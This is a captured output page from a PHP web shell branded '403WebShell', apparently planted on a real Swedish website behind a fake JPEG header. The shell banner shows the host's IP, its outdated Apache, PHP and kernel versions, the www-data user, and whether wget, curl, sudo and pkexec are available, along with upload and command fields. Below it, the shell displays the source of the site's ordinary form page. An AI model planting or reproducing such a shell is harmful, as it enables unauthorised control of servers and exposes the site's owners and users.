????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.144.200.28
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.notes-online.se/symbols/notes/anticimex/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www.notes-online.se/symbols/notes//anticimex/startstop.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Untitled Document</title>
<style>
input {
     height: 20px;
     width: 300px;

}
.text {
	font-family: "Arial Black", Gadget, sans-serif;
}
</style>

<script>

function init(){
	
	
	 
	var path = extractValue("drawingpath");
	var companyid = extractValue("companyid");
	
	var forvaltningsid = path.substr(path.lastIndexOf("/A")+2,4);
	localStorage.setItem("Current_forvaltningsid",forvaltningsid);
	
	 if(localStorage.getItem("Synced_"+companyid+"_"+path) != "Spara"){
		document.getElementById("start").value = "Checka ut!";
	}else{
		document.getElementById("start").value = "Checka in!";
	}
	
	document.getElementById("temp_path").innerHTML = "Fil: "+path.substr(19,100); // Ignore: /Notes Online Files/
}



// Extract variable from url
function extractValue(variable){
	var url = decodeURIComponent(document.location.toString());
    var value = url.substring(url.indexOf(variable+"=") + variable.length + 1);
    var pos = value.indexOf("&");
	if(pos !== -1){
		return value.substring(0, pos);
	}else{
		return value;
	}
}

function delete_cache(){
	var c = confirm("Är du säker på att du vill tömma cachen? All osynkad data kommer att försvinna!");
	if(c == true){
		for (var key in localStorage){
			if(key.indexOf("SENDTOSERVER") !== -1){
				localStorage.removeItem(key);
			}
			
			if(key.indexOf("_count") !== -1){
				localStorage.removeItem(key);
			}
			
			
			if(key.indexOf("highest") !== -1){
				localStorage.removeItem(key);
			}
			
			


		}	
	}
}

function sync(){
	var path = extractValue("drawingpath");
	var companyid = extractValue("companyid");
	
	if(localStorage.getItem("Synced_"+companyid+"_"+path) == null 
	|| localStorage.getItem("Synced_"+companyid+"_"+path) == undefined
	|| localStorage.getItem("Synced_"+companyid+"_"+path) == "" ){
		
		
		get_data();
	}else if(localStorage.getItem("Synced_"+companyid+"_"+path) == "Spara"){
		

		submit_data();
	}else{
	
		
		get_data();
	}
}

function addZeros(n) {
  return (n<10? '00' : n<100? '0' : '') + n;
}

function get_data(){
		var xmlhttp = new XMLHttpRequest();
		var path = extractValue("drawingpath");
		var companyid = extractValue("companyid");

		
		xmlhttp.open("POST","http://www.notes-online.se/symbols/notes/stipa/getData.php",false);
		xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");

		xmlhttp.send("companyid="+extractValue("companyid")+"&username="+extractValue("username")+"&drawingpath="+extractValue("drawingpath"));

		if(xmlhttp.status == 200){
			
			var arr = xmlhttp.responseText.split("###");
		
			if(arr[0].indexOf("ERROR") < 0){
			
				
			
			
				
				
			
				
			var x = 0;
			for (var a in arr){
				if(arr[x] != ""){
					var obj = JSON.parse(arr[x]);
				}else{
					var obj = null;	
				}
				var y = 0;
				
				
				for(var o in obj){
					if(obj[y][0] == "localStorageName"){
						localStorage.setItem(obj[y][2],arr[x]);
					}
					
				
		
					y++;
				}

				x++;
			}	
			
	
			
				localStorage.setItem("Synced_"+companyid+"_"+path,"Spara");
				document.getElementById("start").value = "Checka in!";
				alert("Filen har checkats ut och kan inte ändras av någon annan än dig!");
			}else{
				alert(arr[0]);	
			}
			
		}else{
			alert("Något gick fel vid hämtningen, var god försök igen!");	
		}
}

function submit_data(){
	
	if(checkIfInternet() == true){
		var data = "";
		var path = "";
		for (var key in localStorage){
			if(key.indexOf("SENDTOSERVER") !== -1){
				data += localStorage.getItem(key) + "###";
				
			}
		}

		var xmlhttp = new XMLHttpRequest();
		var path = extractValue("drawingpath");
		var companyid = extractValue("companyid");
		xmlhttp.open("POST","http://www.notes-online.se/symbols/notes/stipa/saveData.php",false);
		xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
		
	
				
		xmlhttp.send("data="+data+"&companyid="+companyid+"&drawingpath="+path);

		if(xmlhttp.status == 200){
			alert(xmlhttp.responseText);
			document.getElementById("start").value = "Checka ut!";
			localStorage.setItem("Synced_"+companyid+"_"+path,"Hämta");
			
		}else{
			alert("Något gick fel vid synkronisering, var god försök igen!");	
		}	
	}else{
		alert("Det gick inte att ansluta till servern. Kontrollera din Internetanslutning och försök igen!");	
	}
}

function checkIfInternet(){	
	var req = new XMLHttpRequest();
	req.open('GET', "http://www.notes-online.se", false); 
	req.send(null);
	if(req.status == 200){
		return true;		
	}else{
		return false;
	}
}



</script>
</head>


<body onload="init();">
<center>
  <br />
  <table width="60%" border="0" cellspacing="0" cellpadding="0" align="center" style="font-family: Constantia, 'Lucida Bright', 'DejaVu Serif', Georgia, 'serif'">
    <tbody>
      <tr class="Text18Black">
        <td width="25%">&nbsp;</td>
        <td width="58%">&nbsp;</td>
      </tr>
      <tr class="Text18Black">
        <td valign="top">Objects name:</td>
        <td width="58%" valign="top"><input name="Projectname" type="text" id="Projectname" size="30" /></td>
      </tr>
      <tr class="Text18Black">
        <td valign="top">Assembly point:</td>
        <td width="58%" valign="top"><input name="assembly" type="text" id="assembly" size="30" /></td>
      </tr>
      <tr class="Text18Black">
        <td valign="top">Emergency number:</td>
        <td width="58%" valign="top"><input name="emergency" type="text" id="emergency" value="112" size="30" /></td>
      </tr>
      <tr class="Text18Black">
        <td valign="top">Situation plan:</td>
        <td width="58%" valign="top"><select name="situation" id="situation">
          <option value="None">None</option>
          <option value="Google Maps">Google Maps</option>
          <option value="Eniro.se">Eniro.se</option>
          <option value="Hitta.se">Hitta.se</option>
        </select></td>
      </tr>
      <tr class="Text18Black">
        <td valign="top">Map URL:</td>
        <td width="58%" valign="top"><input name="url" type="text" id="url" size="30" /></td>
      </tr>
      <tr class="Text18Black">
        <td valign="top">Address:</td>
        <td width="58%" valign="top"><input name="address" type="text" id="address" size="30" /></td>
      </tr>
      <tr class="Text18Black">
        <td valign="top">Plan rotation:</td>
        <td width="58%" valign="top"><select name="rotation" id="rotation">
          <option value="Lanscape">Landscape</option>
          <option value="Portrait">Portrait</option>
        </select></td>
      </tr>
      <tr class="Text18Black">
        <td valign="top">PDF size:</td>
        <td width="58%" valign="top"><select name="PDF" id="PDF">
          <option value="A4">A4</option>
          <option value="A3" selected="selected">A3</option>
          <option value="A1">A1</option>
          <option value="Other">Other</option>
        </select></td>
      </tr>
      <tr class="Text18Black">
        <td valign="top">Print service:</td>
        <td width="58%" valign="top"><select name="print" id="print">
          <option value="No" selected="selected">No</option>
          <option value="A4">A4</option>
          <option value="A3">A3</option>
          <option value="A2">A2</option>
        </select></td>
      </tr>
      <tr class="Text18Black">
        <td valign="top">Deliver with frame:</td>
        <td valign="top"><select name="frame" id="frame">
          <option value="No" selected="selected">No</option>
          <option value="A4">A4</option>
          <option value="A3">A3</option>
          <option value="A2">A2</option>
        </select></td>
      </tr>
      <tr class="Text18Black">
        <td valign="top">Other information:</td>
        <td width="58%" valign="top"><textarea name="other" id="other" cols="45" rows="8"></textarea></td>
      </tr>
    </tbody>
  </table>
  <br />
<span class="text">
<div id="temp_path"></div>
</span>
<br />
<input name="start" id="start" type="button" value="Skapa projekt" style="font-size:16px;width:210px" onclick=""/>
<input name="start5" id="start5" type="button" value="Exportera underlag" style="font-size:16px;width:210px" onclick="document.location.href='ExportToNotesServer://EXPORT'"/>
</center>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit